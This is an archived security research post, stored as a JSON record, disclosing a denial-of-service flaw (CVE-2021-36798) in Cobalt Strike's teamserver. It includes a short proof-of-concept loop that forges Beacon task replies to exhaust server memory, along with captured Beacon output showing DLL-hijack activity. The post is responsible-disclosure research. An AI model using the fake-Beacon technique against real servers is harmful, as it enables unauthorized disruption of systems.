{
	"id": "be34e42d-8efd-4082-91fd-202e084bcadf",
	"created_at": "2026-04-06T00:10:09.424169Z",
	"updated_at": "2026-04-10T13:12:01.36795Z",
	"deleted_at": null,
	"sha1_hash": "75263ce57f2b8c3bfe32f7f06c6541621a45c0d2",
	"title": "Hotcobalt - New Cobalt Strike DoS Vulnerability That Lets You Halt Operations - SentinelLabs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 465024,
	"plain_text": "Hotcobalt - New Cobalt Strike DoS Vulnerability That Lets You\r\nHalt Operations - SentinelLabs\r\nBy Gal Kristal\r\nPublished: 2021-08-04 · Archived: 2026-04-05 18:00:03 UTC\r\nExecutive Summary\r\nVersions 4.2 and 4.3 of Cobalt Strike’s server contain multiple Denial of Service vulnerabilities (CVE-2021-36798).\r\nThe vulnerabilities can render existing Beacons unable to communicate with their C2 server, prevent new\r\nbeacons from being installed, and have the potential to interfere with ongoing operations.\r\nWe have released a new Python library to help generically parse Beacon communication in order to help\r\nthe research security community.\r\nIntroduction\r\nCobalt Strike is one of the most popular attack frameworks designed for Red Team operations. At the same time,\r\nmany APTs and malicious actors also use it.\r\nSentinelOne has seen numerous attacks involving Cobalt Strike Beacons across our customer base. SentinelOne\r\ndetects Cobalt Strike Beacon and we are constantly rolling out new ways to detect modifications or novel ways to\r\nload Beacon in memory.\r\nGiven its rampant adoption by red teams and attackers alike, we wanted to better understand the operational\r\nsecurity of Cobalt Strike. This led us to discover the vulnerabilities reported in CVE-2021-36798 and which we\r\ndescribe below.\r\nBeacon Communications\r\nTo understand the vulnerabilities we found, we will briefly cover how Cobalt Strike Beacon communication\r\nworks.\r\nThe first time the Cobalt Strike server runs, it creates randomly generated RSA keys, private and public, stored in\r\na file named “.Cobalt Strike.beacon_keys”. Every Beacon stager has the public key embedded in it.\r\nhttps://labs.sentinelone.com/hotcobalt-new-cobalt-strike-dos-vulnerability-that-lets-you-halt-operations/\r\nPage 1 of 6\n\nWe can get the Beacon’s public RSA key by parsing its configuration\r\nWhen a Beacon stager runs, it gathers information about the computer it is running on (CPU architecture,\r\nkeyboard layout, internal IP, etc.), encrypts that info using the public key, and sends it to the server in an HTTP\r\nGET request. We will refer to that part as “Beacon registration”.\r\nAfter the Beacon has registered with the server, the attacker can interact with the Beacon. From this point, the\r\nBeacon works by receiving and replying to “tasks”. Tasks can, for example, be used to get a process list, run a\r\ncommand, conduct lateral movement, and many other things of interest to the attacker.\r\nReceiving tasks generally happens over HTTP GET requests and the Beacon replies with the task data over HTTP\r\nPOST requests. Tasks are encrypted using an AES key sent by the Beacon in the registration request. The entire\r\ncommunication flow is explained in the official documentation, but the outline above should suffice for what\r\nfollows.\r\nOne of the most famous features of Cobalt Strike is its Malleable C2. In short, this feature lets the attacker encode\r\n(“transform” in Cobalt’s language) all the beacon’s HTTP communications. The entire process described above is\r\nwrapped in the chosen Malleable profile’s transformation steps, which are also embedded in the stager itself.\r\nBelow is an example of a popular Malleable C2 profile that masquerades traffic as a normal request for the jquery\r\ncode (source):\r\nAn example of a popular Malleable C2 profile\r\nhttps://labs.sentinelone.com/hotcobalt-new-cobalt-strike-dos-vulnerability-that-lets-you-halt-operations/\r\nPage 2 of 6\n\nVulnerabilities\r\nFirst, it should be noted that there was already one known vulnerability in Cobalt Strike that was previously\r\nreported. A great write-up written by nccgroup is worth reading for a more in-depth understanding of Beacon’s\r\ncommunication internals. In practice, that vulnerability allowed for remote code execution on the server.\r\nWe’re not interested in remote code execution vulnerability here as it would be overkill for our purposes.\r\nConsidering that the server’s code is written in Java and isn’t very large, it wasn’t too hard to find bugs there.\r\nFor example, in the Screenshot and Keylogger task replies, there’s an interesting behavior when reading the\r\nreply’s data:\r\npublic void process_beacon_callback_decrypted(final String beaconID, final byte[] responseBytes) {\r\n...\r\n...\r\ntry {\r\nfinal DataInputStream responeBytesStream = new DataInputStream(new ByteArrayInputStream(responseBytes\r\ncmd = responeBytesStream.readInt();\r\nif (cmd == 0) {...}\r\n...\r\nelse if (cmd == 3) {\r\nfinal DataParser dp = new DataParser(CommonUtils.readAll(responeBytesStream));\r\ndp.little();\r\nfinal byte[] scData = dp.readCountedBytes();\r\nfinal int scDesktop = dp.readInt();\r\nfinal String scTitle = this.getCharsets().process(beaconID, dp.readCountedBytes());\r\nfinal String process6 = this.getCharsets().process(beaconID, dp.readCountedBytes());\r\nif (scData.length == 0) {\r\noutput(BeaconOutput.Error(beaconID, \"screenshot from desktop \" + scDesktop + \" is emp\r\nreturn;\r\n}\r\n...\r\noutput(BeaconOutput.OutputB(beaconID, \"received screenshot of \" + scTitle + \" from \" + proces\r\n...\r\n}}}\r\nIn this example, we see the parsing of a screenshot task reply. To read the screenshot’s data, it calls the function\r\nreadCountedBytes, which reads an integer from the first four bytes of the data and treats it as the screenshot’s size\r\nwithout any sanity checks.\r\nThen, before reading the screenshot’s data, it allocates a buffer big enough to hold it:\r\nbyte[] array = new byte[ReplySize];\r\nhttps://labs.sentinelone.com/hotcobalt-new-cobalt-strike-dos-vulnerability-that-lets-you-halt-operations/\r\nPage 3 of 6\n\nBy manipulating the screenshot’s size we can make the server allocate an arbitrary size of memory, the size of\r\nwhich is totally controllable by us. However, in order to trigger this piece of code, we need to be able to talk to the\r\nserver like a Beacon.\r\nBy combining all the knowledge of Beacon communication flow with our configuration parser, we have all we\r\nneed to fake a Beacon.\r\nWe’ve published a POC python script that does just that: it parses a Beacon’s configuration and uses the\r\ninformation stored in it to register a new random Beacon on the server. After registering the Beacon, it’s pretty\r\ntrivial to use the primitive found above to iteratively send fake task replies that squeeze every bit of available\r\nmemory from the C2’s web server thread:\r\nsize = 1000000000\r\nwhile True:\r\n try:\r\n if size \u003c 20:\r\n break\r\n send_task(fake_beacon, size)\r\n except KeyboardInterrupt:\r\n break\r\n except Exception as e:\r\n size = size\r\nThis leads to the crashing of the server’s web thread that handles HTTP stagers and Beacon communication:\r\nCrashing the server's web thread\r\nThis would allow an attacker to cause memory exhaustion in the Cobalt Strike server  (the “Teamserver”) making\r\nthe server unresponsive until it's restarted. This means that live Beacons cannot communicate to their C2 until the\r\noperators restart the server.\r\nRestarting, however, won’t be enough to defend against this vulnerability as it is possible to repeatedly target the\r\nserver until it is patched or the Beacon’s configuration is changed.\r\nEither of these will make the existing live Beacons obsolete as they’ll be unable to communicate with the server\r\nuntil they’re updated with the new configuration. Therefore, this vulnerability has the potential to severely\r\ninterfere with ongoing operations.\r\nAlthough used every day for malicious attacks, Cobalt Strike is ultimately a legitimate product, so we have\r\ndisclosed these issues responsibly to HelpSystems and they have fixed the vulnerabilities in the last release.\r\nUtilities\r\nOn our Cobalt Strike parser repository, we’ve added new modules and code examples that implement:\r\nhttps://labs.sentinelone.com/hotcobalt-new-cobalt-strike-dos-vulnerability-that-lets-you-halt-operations/\r\nPage 4 of 6\n\nParsing of a Beacon’s embedded Malleable profile instructions\r\nParsing of a Beacon’s configuration directly from an active C2 (like the popular nmap script)\r\nBasic code for communicating with a C2 as a fake Beacon\r\nOther than registering a fake Beacon with the server, the code we are releasing makes it easier to parse captured\r\nBeacon communications in a generic way.\r\nLet’s take, for example, a case of a captured unencrypted Beacon communication from malware-traffic-analysis\r\nand decode it using the new communication module:\r\nfrom urllib import parse\r\nfrom pcaper import PcapParser\r\nfrom parse_beacon_config import *\r\nfrom comm import *\r\nconf = cobaltstrikeConfig(r\"beacon.bin\").parse_config()\r\npparser = PcapParser()\r\nreqs = pparser.read_pcap({'input': r\"2019-07-25-Hancitor-style-Amadey-with-Pony-and-Cobalt-Strike.pca\r\nt = Transform(conf['HttpPost_Metadata'])\r\nfor req in reqs:\r\nif conf['HttpPostUri'] in req.uri:\r\nparams = {k: v[0] for k, v in parse.parse_qs(parse.urlsplit(req.uri).query).items()}\r\nprint('nnFound beacon reply:n', t.decode(req.body, req.headers, params)[1])\r\nOutput:\r\n...\r\nFound beacon reply:\r\n ♠r↓10.7.25.101:445 (platform: 500 version: 6.1 name: HIDDENROAD-PC domain: WORKGROUP)\r\nScanner module is complete\r\n\"))\r\nFound beacon reply:\r\n ☺►[*] Wrote hijack DLL to 'C:UsersSARAH~1.RUTAppDataLocalTemp745f.dll'\r\n[+] Privileged file copy success! C:WindowsSystem32sysprepCRYPTBASE.dll\r\n[+] C:WindowsSystem32sysprepsysprep.exe ran and exited.\r\n[*] Cleanup successful\r\n...\r\nIt parses the Malleable C2 instructions embedded in the Beacon’s configuration and uses it to decode Beacon\r\nreplies from the captured HTTP requests.\r\nThere’s a lot that can be done with this new communication library and it will be interesting to see what other\r\nresearchers from the community will do with it.\r\nhttps://labs.sentinelone.com/hotcobalt-new-cobalt-strike-dos-vulnerability-that-lets-you-halt-operations/\r\nPage 5 of 6\n\nConclusion\r\nResearch into attack frameworks like Cobalt Strike and Cellebrite is still a niche area. We hope that this research\r\nand the tools we have released help to further encourage research into the robustness of attack frameworks and\r\nexpand the range of available options when facing their consistent abuse.\r\nDisclosure Timeline\r\nWe would like to thank HelpSystems for their approach to our disclosure and for remediating the vulnerabilities.\r\n04/20/2021 - Initial contact with HelpSystems for issue disclosure.\r\n04/22/2021 - Issue details disclosed to HelpSystems.\r\n04/23/2021 - HelpSystems confirmed the issue and asked for an extension until August 3rd.\r\n04/28/2021 - SentinelOne accepted the extension.\r\n07/18/2021 - Submitted CVE request to MITRE.\r\n07/19/2021 - CVE-2021-36798 was assigned and reserved for the specified issue.\r\n08/02/2021 - SentinelOne shared the publication date and post for review.\r\n08/02/2021 - HelpSystems reviewed and confirmed the post for publication.\r\n08/04/2021 - HelpSystems released Cobalt Strike 4.4, which contains a fix for CVE-2021-36798.\r\nAll issues found by SentinelOne are disclosed to the relevant third party according to our Responsible Disclosure\r\nPolicy for Third Parties.\r\nSource: https://labs.sentinelone.com/hotcobalt-new-cobalt-strike-dos-vulnerability-that-lets-you-halt-operations/\r\nhttps://labs.sentinelone.com/hotcobalt-new-cobalt-strike-dos-vulnerability-that-lets-you-halt-operations/\r\nPage 6 of 6",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://labs.sentinelone.com/hotcobalt-new-cobalt-strike-dos-vulnerability-that-lets-you-halt-operations/"
	],
	"report_names": [
		"hotcobalt-new-cobalt-strike-dos-vulnerability-that-lets-you-halt-operations"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434209,
	"ts_updated_at": 1775826721,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/75263ce57f2b8c3bfe32f7f06c6541621a45c0d2.pdf",
		"text": "https://archive.orkl.eu/75263ce57f2b8c3bfe32f7f06c6541621a45c0d2.txt",
		"img": "https://archive.orkl.eu/75263ce57f2b8c3bfe32f7f06c6541621a45c0d2.jpg"
	}
}